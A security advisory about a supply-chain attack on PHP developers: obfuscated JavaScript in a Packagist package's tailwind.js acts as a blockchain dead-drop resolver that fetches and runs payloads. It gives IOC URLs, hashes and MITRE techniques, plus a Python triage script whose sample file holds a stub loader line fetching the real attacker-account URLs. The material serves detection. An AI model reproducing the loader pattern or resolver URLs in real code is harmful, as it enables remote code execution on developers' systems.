Famous Chollima Targets PHP Developers Through Compromised Packagist Package
Famous Chollima APT targets PHP developers via compromised Packagist package with malicious JavaScript in tailwind.js.
Summary
The Famous Chollima APT group is targeting PHP developers through a compromised Packagist package. The malicious code was found in a development version of the `roberts/leads` package: obfuscated JavaScript injected into `tailwind.js` acts as a dead-drop resolver (MITRE T1102.001), querying the public Tron (`api.trongrid.io`) and Aptos (`fullnode.mainnet.aptoslabs.com`) node APIs for the most recent transaction of attacker-controlled accounts and using that transaction data to retrieve and execute encrypted payloads. This campaign may be part of a fake job interview or developer-task lure. Because the code shipped in a development version rather than a tagged release, the first check for a responder is whether `composer.lock` resolves `roberts/leads` (or any other dependency) to a `dev-*` or `*-dev` version, and whether any file in `vendor/` matches the hashes or dead-drop URLs listed below.
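As an added example (not code from the advisory, and not code from the `roberts/leads` project), the Python script below performs the three checks the summary points at for a Composer project: it hashes every file under `vendor/` against the advisory's SHA-256 indicators, scans JavaScript files for the Tron and Aptos account-transaction URLs that the dead-drop resolver uses, and lists packages that `composer.lock` has resolved to a development version. It assumes a standard Composer layout (`vendor/` tree plus `composer.lock`). The sample project it builds is constructed for the demonstration: the path `resources/js/tailwind.js`, the loader body in that file, and the package `acme/clean` are assumptions and do not reproduce the real package contents.

```python
"""Offline triage of a Composer project for the IOCs in this advisory.
Added example; the sample tree it builds is constructed, not real package data."""
import hashlib
import json
import re
import tempfile
from pathlib import Path

# SHA-256 indicators published in the advisory.
IOC_SHA256 = {
    "522b28a2f78771715497ba53729d4ab9a50e982322c391379f3bddf7c8cb363f",
    "96afdba882046385242cbed46871e41147c8055c5d9eff7460847b2c01a77dc3",
}

# Dead-drop resolver endpoints (T1102.001): the loader asks a public Tron or Aptos node
# for the latest transaction of an attacker-controlled account. Matching the
# account-transactions path shape, not the bare domain, keeps legitimate blockchain
# API usage out of the hits (both providers are legitimate public services).
DEAD_DROP_RE = re.compile(
    r"https?://(?:api\.trongrid\.io/v1/accounts/[A-Za-z0-9]+/transactions"
    r"|fullnode\.mainnet\.aptoslabs\.com/v1/accounts/0x[0-9a-fA-F]+/transactions)",
    re.IGNORECASE,
)

# Composer version strings that resolve to a development snapshot (dev-main, 1.x-dev, ...).
DEV_VERSION_RE = re.compile(r"^dev-|-dev$")


def sha256_file(path: Path) -> str:
    """Stream a file through SHA-256 and return the hex digest."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def dead_drop_urls(path: Path) -> list[str]:
    """Return dead-drop resolver URLs found in plain form in a JS file.
    An obfuscated loader may split or encode the URL; this catches only the plain text."""
    text = path.read_text(encoding="utf-8", errors="replace")
    return DEAD_DROP_RE.findall(text)


def dev_packages(lock_path: Path) -> list[str]:
    """'name version' for every package in composer.lock pinned to a dev version."""
    lock = json.loads(lock_path.read_text(encoding="utf-8"))
    found = []
    for section in ("packages", "packages-dev"):
        for pkg in lock.get(section, []):
            if DEV_VERSION_RE.search(pkg.get("version", "")):
                found.append(f"{pkg['name']} {pkg['version']}")
    return found


def triage(project: Path, ioc_hashes=IOC_SHA256) -> dict:
    """Walk vendor/ and composer.lock; paths in the result are relative to the project."""
    result = {"hash_hits": [], "dead_drop_hits": [], "dev_packages": []}
    for f in sorted((project / "vendor").rglob("*")):
        if not f.is_file():
            continue
        rel = f.relative_to(project).as_posix()
        if sha256_file(f) in ioc_hashes:
            result["hash_hits"].append(rel)
        if f.suffix == ".js":
            for url in dead_drop_urls(f):
                result["dead_drop_hits"].append((rel, url))
    lock = project / "composer.lock"
    if lock.exists():
        result["dev_packages"] = dev_packages(lock)
    return result


def build_sample_project() -> Path:
    """Constructed sample tree: one dev-version package carrying a tailwind.js with a
    dead-drop lookup, one clean package. File layout and loader body are assumptions."""
    root = Path(tempfile.mkdtemp(prefix="composer-triage-"))
    bad = root / "vendor" / "roberts" / "leads" / "resources" / "js"
    bad.mkdir(parents=True)
    (bad / "tailwind.js").write_text(
        "/* constructed stand-in for the injected loader; not the real code */\n"
        'const a="https://api.trongrid.io/v1/accounts/TMfKQEd7TJJa5xNZJZ2Lep838vrzrs7mAP/'
        'transactions?only_confirmed=true&only_from=true&limit=1";\n'
        'const b="https://fullnode.mainnet.aptoslabs.com/v1/accounts/'
        '0xbe037400670fbf1c32364f762975908dc43eeb38759263e7dfcdabc76380811e/transactions?limit=1";\n'
        "fetch(a).then(r=>r.json()).then(run);\n",
        encoding="utf-8",
    )
    clean = root / "vendor" / "acme" / "clean" / "src"
    clean.mkdir(parents=True)
    (clean / "Clean.php").write_text("<?php\nreturn true;\n", encoding="utf-8")
    lock = {
        "packages": [
            {"name": "roberts/leads", "version": "dev-main"},
            {"name": "acme/clean", "version": "1.2.3"},
        ],
        "packages-dev": [],
    }
    (root / "composer.lock").write_text(json.dumps(lock), encoding="utf-8")
    return root


if __name__ == "__main__":
    print(json.dumps(triage(build_sample_project()), indent=2))
```

Run it against a real checkout with `triage(Path("/path/to/project"))`; the hash check is exact, while the URL and dev-version checks are heuristics that will miss a loader whose URL is assembled at runtime, so an empty result is not a clean bill of health.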
Full text
By Kirill Boychenko - May 28, 2026
Indicators of Compromise
- url — hxxps://api[.]trongrid[.]io/v1/accounts/TMfKQEd7TJJa5xNZJZ2Lep838vrzrs7mAP/transactions?only_confirmed=true&only_from=true&limit=1
- url — hxxps://fullnode[.]mainnet[.]aptoslabs[.]com/v1/accounts/0xbe037400670fbf1c32364f762975908dc43eeb38759263e7dfcdabc76380811e/transactions?limit=1
- hash_sha256 — 522b28a2f78771715497ba53729d4ab9a50e982322c391379f3bddf7c8cb363f
- hash_sha256 — 96afdba882046385242cbed46871e41147c8055c5d9eff7460847b2c01a77dc3
- domain — trongrid.io (legitimate public Tron node API, abused here as a dead-drop resolver; alert on the account-transaction URLs above rather than blocking the domain outright)
- domain — aptoslabs.com (legitimate public Aptos node API, abused in the same way)
- mitre_attack — T1195.002 (Supply Chain Compromise: Compromise Software Supply Chain)
- mitre_attack — T1204.002 (User Execution: Malicious File)
- mitre_attack — T1059.007 (Command and Scripting Interpreter: JavaScript)
- mitre_attack — T1027 (Obfuscated Files or Information)
- mitre_attack — T1102.001 (Web Service: Dead Drop Resolver)
- mitre_attack — T1105 (Ingress Tool Transfer)